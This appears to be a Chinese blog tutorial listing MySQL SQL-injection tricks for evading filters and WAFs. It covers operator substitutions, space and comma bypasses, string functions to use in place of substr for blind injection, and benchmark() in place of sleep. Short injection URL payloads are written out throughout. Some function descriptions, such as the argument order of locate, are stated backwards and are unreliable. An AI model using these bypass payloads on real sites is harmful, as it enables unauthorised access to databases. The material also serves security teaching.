html sql注入_SQL注入特殊小技巧总结

一位苦于信息安全的萌新小白帽 本实验仅用于信息防御教学，切勿用于它用途 公众号：XG小刚  小技巧 

---

在平常的SQL注入过程中，难免会存在一些敏感函数被过滤，或者被WAF识别所拦截。所以我们可以通过其他不常用的函数来绕过过滤，实现相同的效果。 在此只通过 MYSQL数据库 来表达意思， 其他 数据库自行百度谷歌。。。。。。  逻辑运算符 

---

注入过程中，用到最最最频繁的就是逻辑符号，像and 1=1、or 2>1等。当发现and，or，=等逻辑符号被过滤后我就很气愤。气愤归气愤，我们可以通过别的 特殊符号 来替代他们，这样就该他们气愤了，哈哈哈。。。

or替代

当发现or被过滤时，我们可以用”||”替代

?id = 2' or 1=1 --+?id = 2' || 1=1 --+

and替代

当发现and被过滤时，我们可以用”&&”替代

?id = 1' and 1=1 --+?id = 1' && 1=1 --+

异或运算符 ”^”

异或运算符”^”过滤时，用”XOR”替代

?id=1 union select 1=1 XOR 1=1--+?id=1 union select 1=1 ^ 1=1 --+

逗号

逗号被过滤可以使用join函数将参数连接起来

?id=1 union select 11,22,33--+?id=1 union select * from (select 11)a join (select 22)b join (select 33)c --+

空格

当空格被过滤删除时，使用加号 +，或者空字符串来代替
通用空字符串：%0a %0b %0c %0d %A0 %20 %09
特别注意 %A0 这个不会被php的s进行匹配
使用内联注释也可以代替空格/**/

?id=1 and 1=1 --+?id=1%A0and%A01=1%A0--+?id=1/**/and/**/1=1/**/--+

等于号”=”

当等于号”=”被过滤时，可以使用很多种函数替代1.Between:在什么什么之间

select database() between 0x61 and 0x7a

2.in：in常用于mysql的where表达式中来查询某个范围内的数据

select * from user where id in (1,2,3)

3.Like：模糊查询，可以当等于号用

?id=2 and 1 like 1?id = 1.1 and 1=1

4.使用正则代替等于号,regexp等同于rlike  盲注函数被过滤 

---

在进行盲注时候，用的最多的就是substr()截取字符串，当此函数被过滤，我们可以使用其他函数截取字符串

left(str, length)

从左边length位截取字符串

select left(‘abcdefghijklmn’,8)

结果为：abcdefgh

right(str,length)

使用方法同left

mid(str,start,length)

截取字符串从start开始并截取length长度，相当于substr()

Locate(substr,str)

locate是用来返回字符串的位置
locate(substr,str)返回字符串substr中第一次出现str的位置

select locate("d",'www.baidu.com') #返回8

locate(substr,str,pos)返回字符串substr中第一次出现str的位置，从第pos个位置开始

SELECT locate("a",'pan.baidu.com',3)#返回6

locate()用来判断字符串长度

select locate('m','m123456m',15)

position (substr IN str)

position 的效果与instr()，locate()相同，但语法不同

用法：POSITION(substr IN str) 返回字符串substr中第一次出现str的位置与LOCATE(substr,str)的结果相同
例：返回字符串“d”自一次出现的位置

SELECT position("d"in’www.baidu.com’);

结果：8

替代ascii

Hex()，Bin()，Ord()

字符串截取函数在mysql中有许多，主要利用得当，一样可以达到盲注的效果

 其他 

---

sleep过滤

当sleep函数被过滤，可以使用benchmark函数。他是指执行某函数的次数，次数多了照样实现sleep函数相同的时间延迟。

benchmark(100000,SHA1(‘1’)), 1

database(),version()被过滤

当database(),concat()函数被过滤，可以在名和括号之间加入特殊字符，例如

database/**/()`version`()

报错注入

报错注入是利用某些函数报错，来爆出所需要的内容

可以阅读此文章来了解报错注入：

https://www.cnblogs.com/richardlee97/p/10617115.html

总结

---

在SQL注入过程中难免会有磕磕绊绊，不要放弃，静下心来钻研，总会有解决之法。
尤其是后端的各种过滤，WAF的拦截等等，慢慢研究就会轻松绕过。
SQL注入不会的可以阅读我的这两篇博客了解一下。sql手工注入数据库类型判断